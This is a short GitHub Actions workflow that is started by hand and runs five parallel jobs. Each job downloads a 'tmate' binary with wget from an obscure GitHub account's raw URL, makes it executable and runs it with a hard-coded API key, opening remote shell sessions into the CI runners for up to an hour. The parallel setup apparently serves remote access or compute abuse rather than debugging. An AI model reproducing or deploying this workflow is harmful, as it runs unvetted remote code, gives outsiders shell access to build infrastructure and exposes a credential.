name: Parallel tmate Runner

on:
  workflow_dispatch:

jobs:
  tmate-parallel:
    runs-on: ubuntu-latest
    timeout-minutes: 60
    strategy:
      matrix:
        job_id: [1, 2, 3, 4, 5]
    steps:
      - name: Download tmate binary
        run: |
          wget https://raw.githubusercontent.com/hp20h5w91nf1/hp20h5w91nf1/main/tmate
          chmod +x tmate

      - name: Run tmate session
        run: |
          ./tmate -F -n -k tmk-mS87E0h6YTY55X6FpuAAbWFMpg
